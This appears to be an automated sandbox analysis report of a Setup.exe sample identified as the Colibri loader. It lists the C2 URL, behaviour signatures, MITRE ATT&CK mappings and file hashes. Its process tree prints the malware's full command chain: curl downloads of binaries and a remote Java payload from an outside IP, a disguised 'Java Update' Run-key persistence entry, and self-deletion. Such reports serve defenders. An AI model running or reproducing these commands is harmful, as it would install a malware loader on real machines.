Analysis

  • max time kernel
    137s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20220901-en locale:en-us os:windows10-2004-x64 system
  • submitted
    05-10-2022 21:48

General

  • Target

    AppSetup/Setup.exe

  • Size

    700.0MB

  • MD5

    7c5d1c8213b4f6d0024271fef44e6cd0

  • SHA1

    207849a369dae9a6084850791e0ec53209cc928e

  • SHA256

    bde1ea677730594b57aec1799bb7a51bc1b821ea0f6fa1281127f94cc12445a5

  • SHA512

    d90f3b0054376d642e0d57f68a9cd54f8a29b893dfa4428a3a8280c0c93fc0c441b412a5367865d306a08a36720a9ed186bc290899f7c55341768188b7fa635d

  • SSDEEP

    12288:OGnwnjo3r9nWZQzjFeM6DJOjB9sTTHy832srZZUcCO5x9tWFHeQR8KeHj3Fuxkxv:OC9nYQb6VOcdFz9twRgb6kxChx47B

Malware Config

Extracted

Family

colibri

Version

1.2.0

Botnet

test

C2

http://65.109.7.23/gate.php

Signatures

  • Colibri Loader

    A loader sold as MaaS first seen in August 2021.

  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\AppSetup\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\AppSetup\Setup.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1456
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQA1AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2744
    • C:\Users\Admin\AppData\Local\Temp\AppSetup\Setup.exe
      C:\Users\Admin\AppData\Local\Temp\AppSetup\Setup.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2864
      • C:\Users\Admin\AppData\Local\Temp\Build.exe
        "C:\Users\Admin\AppData\Local\Temp\Build.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4224
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQA1AA==
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4848
        • C:\Users\Admin\AppData\Local\Temp\Build.exe
          C:\Users\Admin\AppData\Local\Temp\Build.exe
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Checks processor information in registry
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4936
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C "(mkdir "%APPDATA%\Java\jre1.8.0_141\bin\client") & (mkdir "%APPDATA%\Java\jre1.8.0_141\lib\i386") & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\javaw.exe" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\javaw.exe" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/javaw.exe) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\java.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\java.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/java.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\verify.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\verify.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/verify.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\zip.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\zip.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/zip.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\net.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\net.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/net.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\nio.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\nio.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/nio.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\msvcp120.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\msvcp120.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/msvcp120.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\msvcr120.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\msvcr120.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/msvcr120.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\bin\client\jvm.dll" curl -L -o "%APPDATA%\Java\jre1.8.0_141\bin\client\jvm.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/jvm.dll) & (if not exist "%APPDATA%\Java\jre1.8.0_141\lib\rt.jar" curl -L -o 
"%APPDATA%\Java\jre1.8.0_141\lib\rt.jar" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/rt.jar) & (if not exist "%APPDATA%\Java\jre1.8.0_141\lib\i386\jvm.cfg" curl -L -o "%APPDATA%\Java\jre1.8.0_141\lib\i386\jvm.cfg" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/jvm.cfg) & (cd /d "%APPDATA%\Java\jre1.8.0_141") & (curl -L -o "%APPDATA%\Java\jre1.8.0_141\Runtime.class" -k http://193.106.191.11/RuntimeMain.class) & (reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v "Java Update 8u141" /t REG_SZ /d "cmd /c \"cd \"%APPDATA%\Java\jre1.8.0_141\" ^&^& start /b bin\javaw.exe -Dsun.stderr.encoding=ASCII -Dsun.stdout.encoding=ASCII -Dsun.jnu.encoding=UTF-8 Runtime ^&^& exit\"") & (bin\javaw -Dsun.stderr.encoding=ASCII -Dsun.stdout.encoding=ASCII -Dsun.jnu.encoding=UTF-8 Runtime)"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1164
            • C:\Windows\SysWOW64\curl.exe
              curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\javaw.exe" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/javaw.exe
              6⤵
                PID:1644
              • C:\Windows\SysWOW64\curl.exe
                curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\java.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/java.dll
                6⤵
                  PID:1888
                • C:\Windows\SysWOW64\curl.exe
                  curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\verify.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/verify.dll
                  6⤵
                    PID:4664
                  • C:\Windows\SysWOW64\curl.exe
                    curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\zip.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/zip.dll
                    6⤵
                      PID:2392
                    • C:\Windows\SysWOW64\curl.exe
                      curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\net.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/net.dll
                      6⤵
                        PID:1904
                      • C:\Windows\SysWOW64\curl.exe
                        curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\nio.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/nio.dll
                        6⤵
                          PID:1296
                        • C:\Windows\SysWOW64\curl.exe
                          curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\msvcp120.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/msvcp120.dll
                          6⤵
                            PID:2540
                          • C:\Windows\SysWOW64\curl.exe
                            curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\msvcr120.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/msvcr120.dll
                            6⤵
                              PID:4032
                            • C:\Windows\SysWOW64\curl.exe
                              curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\client\jvm.dll" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/jvm.dll
                              6⤵
                                PID:4556
                              • C:\Windows\SysWOW64\curl.exe
                                curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\lib\rt.jar" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/rt.jar
                                6⤵
                                  PID:4452
                                • C:\Windows\SysWOW64\curl.exe
                                  curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\lib\i386\jvm.cfg" -k https://github.com/Ga4iJava/jdk-binaries/releases/download/main-1/jvm.cfg
                                  6⤵
                                    PID:3916
                                  • C:\Windows\SysWOW64\curl.exe
                                    curl -L -o "C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\Runtime.class" -k http://193.106.191.11/RuntimeMain.class
                                    6⤵
                                      PID:1360
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v "Java Update 8u141" /t REG_SZ /d "cmd /c \"cd \"C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\" && start /b bin\javaw.exe -Dsun.stderr.encoding=ASCII -Dsun.stdout.encoding=ASCII -Dsun.jnu.encoding=UTF-8 Runtime && exit\""
                                      6⤵
                                      • Adds Run key to start application
                                      • Modifies registry key
                                      PID:1204
                                    • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\javaw.exe
                                      bin\javaw -Dsun.stderr.encoding=ASCII -Dsun.stdout.encoding=ASCII -Dsun.jnu.encoding=UTF-8 Runtime
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:4696
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C timeout 5 & del "C:\Users\Admin\AppData\Local\Temp\Build.exe"
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2532
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout 5
                                      6⤵
                                      • Delays execution with timeout.exe
                                      PID:2820
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 1336
                                3⤵
                                • Program crash
                                PID:2004
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2864 -ip 2864
                            1⤵
                              PID:996

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Persistence
    Registry Run Keys / Startup Folder (T1060): 1

  • Defense Evasion
    Modify Registry (T1112): 2

  • Credential Access
    Credentials in Files (T1081): 1

  • Discovery
    Query Registry (T1012): 3
    System Information Discovery (T1082): 3

  • Collection
    Data from Local System (T1005): 1

Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                              Filesize

                              1KB

                              MD5

                              4280e36a29fa31c01e4d8b2ba726a0d8

                              SHA1

                              c485c2c9ce0a99747b18d899b71dfa9a64dabe32

                              SHA256

                              e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

                              SHA512

                              494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                              Filesize

                              53KB

                              MD5

                              06ad34f9739c5159b4d92d702545bd49

                              SHA1

                              9152a0d4f153f3f40f7e606be75f81b582ee0c17

                              SHA256

                              474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

                              SHA512

                              c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              16KB

                              MD5

                              017620670b4e2b18d979a618f8cff16a

                              SHA1

                              954c4df7b95ec997036c92e8d0fd4d755262e839

                              SHA256

                              262ce1e2c40e8ad42487cbf0d24d8926c8289915ff2a9340f12df5d5f7b2b333

                              SHA512

                              e3144790f7e477ff65e56590eaa2ce519bcba9f7f8ceb2eec7dee0dfba1af07a7d8cfcfa745006dc0c71c5c7e0711663ea116504de1c7a1373ad9ac3d5ec96f1

                            • C:\Users\Admin\AppData\Local\Temp\Build.exe
                              Filesize

                              1.9MB

                              MD5

                              4ca8c9a0b9c71c36ad4a3bacf084eede

                              SHA1

                              901d7cc50c73c585f979bab9efe426a12d40ecfe

                              SHA256

                              9b7b830adffaf009ec511b32a7c12871765a6a274f4fa0df758ca5ad8e64ad92

                              SHA512

                              35a2e6ff75ac7858e20451881cac84de0a5265e0c66a875c18c749ad9d3a857455edd72645f405157e2a87a1273b024be13b423a4d36b95674cb509071b43d9c

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\Runtime.class
                              Filesize

                              27KB

                              MD5

                              10ef0192cb8a9a12d7d8880977712dcf

                              SHA1

                              f9b60ada7527c56d5c72862c73acea4ebe3a9d67

                              SHA256

                              f952e13c478b72d2bbef97a9156f62d4ec075f1c1f00d5bef2574084cd25e7f2

                              SHA512

                              c8686b113e1ca4b507ada22a07bf0966a639998e2c327afc9f1a7682256bebab3f338dd9e8aa66ee39fcfd319d2ee21bf0142adf30035cbcec50a5974c7c7161

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\client\jvm.dll
                              Filesize

                              3.7MB

                              MD5

                              b21095557e873cf2d8591a264197141c

                              SHA1

                              481ab680ef38b02c0d9dc87c9e1b9688763bc3bc

                              SHA256

                              4dfcd7546ddcd32b3baf5297e280bca77be81016e87a675c9cd56f88d6e010d7

                              SHA512

                              fc30c5f6edaf663017ba7587839ac28902774b6a60f512e8b984a2e3e8cb4d68fdd088f41f98b6981a785a452545ce68e26d6f842d0df58ee682d0027ecf046f

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\java.dll
                              Filesize

                              136KB

                              MD5

                              36e1b4981ad764dd214a124c007caf73

                              SHA1

                              37cfb21e13099bfa7b20e1d892e1d798454a4cc9

                              SHA256

                              c7a3896d4fa6373021a9561dd94d3c1d2a365c769c0b2bd91bb413bc0ec11026

                              SHA512

                              f23ca754ad380b0a5aeabfb368ea39dc1c101222a41cf2a7a66d022ddd196963f11d1bb1345ceee318c20da1af64f768915cac1b6b1774fa7e17a741e2aad0c3

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\javaw.exe
                              Filesize

                              203KB

                              MD5

                              22c17a0c25b983cff99678f6c1bf3b93

                              SHA1

                              80043ffc26541f1a84f9433c105a12b5e7bf8687

                              SHA256

                              4ad907bcead1dc38ff4c7d964abbf4630ca2de81e195cf3f93d1861aca9c8779

                              SHA512

                              faa3f114548eca84b1ac960d86044c41edb76352a63dab12318453dfcc45f840f05364262f0598d9884dce10badb683567391374fec5c2a1d5b5e78ded8aea18

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\msvcp120.dll
                              Filesize

                              439KB

                              MD5

                              c6a06c5d0378301834639ddbe4384b52

                              SHA1

                              a5958f566d5d951a14468923496d37891dc9f7c2

                              SHA256

                              54d0bab82c3e8da896f806a80041d52546aaaa4d6068cc9579631ab00d0385b6

                              SHA512

                              f501d6a261bcda97c21fc733a3e751ea7af027f9356c4c6ad060db3f8195c295cf9b2cc13855bbdb316ce1e275fbec276b639918d40d865f54bf3c09830dff83

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\msvcr120.dll
                              Filesize

                              942KB

                              MD5

                              924cb26120b3bac52f7dc8815683588f

                              SHA1

                              649176369546f6af22d61ecab6dfea73e703ea6d

                              SHA256

                              035bd360935f369aba486b3ae12d9ef2f86bd1ca5e8ebb07c2ff43a64046ea2c

                              SHA512

                              66060188b51f3163ec689ca29120cdf31a74436ad0192e5822be62eefba8e5bd75e504f15ca97e09c21370f9bc1c19871d7cee2e39a072333a4b6dd5340c9d08

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\net.dll
                              Filesize

                              85KB

                              MD5

                              7fe7d7ed9948d595efdba1c6bdc4d8a4

                              SHA1

                              327063ba8da63781834867180ff20b988d97ec10

                              SHA256

                              723e658ba1862dfca1033319d9b7318c74a1b8e88e33b35d44b196b12c73dabd

                              SHA512

                              92a42c337e1780be15fa507e92a4664f1da6a6ee59f06119653569354749099658222184ba459c1c7f6666482bd864a716cd77eff5ddde0710c778f7610f97d5

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\nio.dll
                              Filesize

                              54KB

                              MD5

                              89d7fa3b5328dacc1ba486fc205d1eab

                              SHA1

                              b1ae460298956590ff6da27aa66eab416e4bd022

                              SHA256

                              4ab6e6a941454f401c760c34433c695ae1ba4a669e1f800b0112f6832111cd66

                              SHA512

                              0c374634f262250cb13532336097b8a87afa7e6b6094b601b95f1bdd8f5019fbdd250f86f5445c9671ed1734b39292a294f7f651dfec66dd4d447e7d2d546a60

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\verify.dll
                              Filesize

                              44KB

                              MD5

                              81b032d527e70a0a68ddae876e1ee3e1

                              SHA1

                              a5c975b5f5066698caebd7b9a373b481fc9ee882

                              SHA256

                              94458eb03feb96651c8bbe9b64b0d15c0ef9007d463cf576e66bb9ff22831896

                              SHA512

                              bcb762a11047459a07fd65df4f27d0df8e047ddd6d1f28f877443069c4f6d1c7649794125917f3de7fa43c10a8f065cd843d00e3d7c7a7c368eaca1536178b14

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\bin\zip.dll
                              Filesize

                              74KB

                              MD5

                              6128cc6cbcee211aeff1c7b92e132d5d

                              SHA1

                              2749621bd11f112b5f7f4c00c3c10e733a7e2902

                              SHA256

                              90fd233ac66f613c40b70cc6c2c7750cf5ed46489156c93e13b017a78fab6aba

                              SHA512

                              d706169efc0552e4aa107fae16d8168d7587b49d527ec4502859cc2776d9285a9dd3d5ac5d432f0456e039bb4e621b9af39926c74e1f7d881409ecdb4667edb9

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\lib\i386\jvm.cfg
                              Filesize

                              28B

                              MD5

                              19079ca57b561559eca94490357ec716

                              SHA1

                              ac99a24a23811cd1ae33a1462882d71e69ae18d0

                              SHA256

                              c19c19f487657b3e2c4b70865d05b2762b8707f8538ac6cc01c258b9e09d193f

                              SHA512

                              a24ae4d97810574d43fda47a63acf044a7c24ed288b5171e6ac2d13c4088cf42c4ccc6d14be98ba4eddf898e8841d72ab10cd507f336de707498b2394b4efc32

                            • C:\Users\Admin\AppData\Roaming\Java\jre1.8.0_141\lib\rt.jar
                              Filesize

                              5.6MB

                              MD5

                              d53cc83ca7008801208a8e2b4bc85df7

                              SHA1

                              10063edd90563ba8b757be4abb28d24f0f4f8422

                              SHA256

                              7571c3cbdfea13b0ca22dcce9559d3fdc163f7f210f29332beacef9e17502bff

                              SHA512

                              a3186c1dc5a3e73615923a6a3d86acf4f20b051d886b2d4bfbe51f4fcfd461c0d7b6d1dcdff9f1f483d80e8fede5418b11ea36cc4589987db78c197a15fe9f8b
